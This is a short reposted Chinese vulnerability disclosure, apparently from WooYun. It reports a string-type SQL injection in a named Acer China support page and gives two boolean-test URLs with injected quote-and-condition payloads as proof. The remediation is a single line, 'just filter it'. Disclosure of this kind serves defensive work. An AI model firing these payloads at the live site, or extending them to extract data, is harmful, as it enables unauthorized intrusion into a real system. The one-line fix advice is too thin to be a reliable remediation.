好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

宏基中国sql字符型注入及修复 - 网站安全 - 自学

 

简要描述:

 

http://support.acer.com.cn/newsupport/service/servnetnew.asp?prov=hubei

注入

字符型的

详细说明:

没什么好说了很明显了!

 

漏洞 证明:

 

http://support.acer.com.cn/newsupport/service/servnetnew. asp ?prov=hubei' and 1=1 and 'x'='x

 

 

http://support.acer.com.cn/newsupport/service/servnetnew.asp?prov=hubei' and 1=2 and 'x'='x

 

 

 

修复方案:过滤吧!

 

作者  公子@乌云

查看更多关于宏基中国sql字符型注入及修复 - 网站安全 - 自学的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12846
  阅读:40次

上一篇: EspCms网站系统注入漏洞及修复 - 网站安全 - 自学

下一篇:关于旁注的一点点方法总结 - 网站安全 - 自学p

相关资讯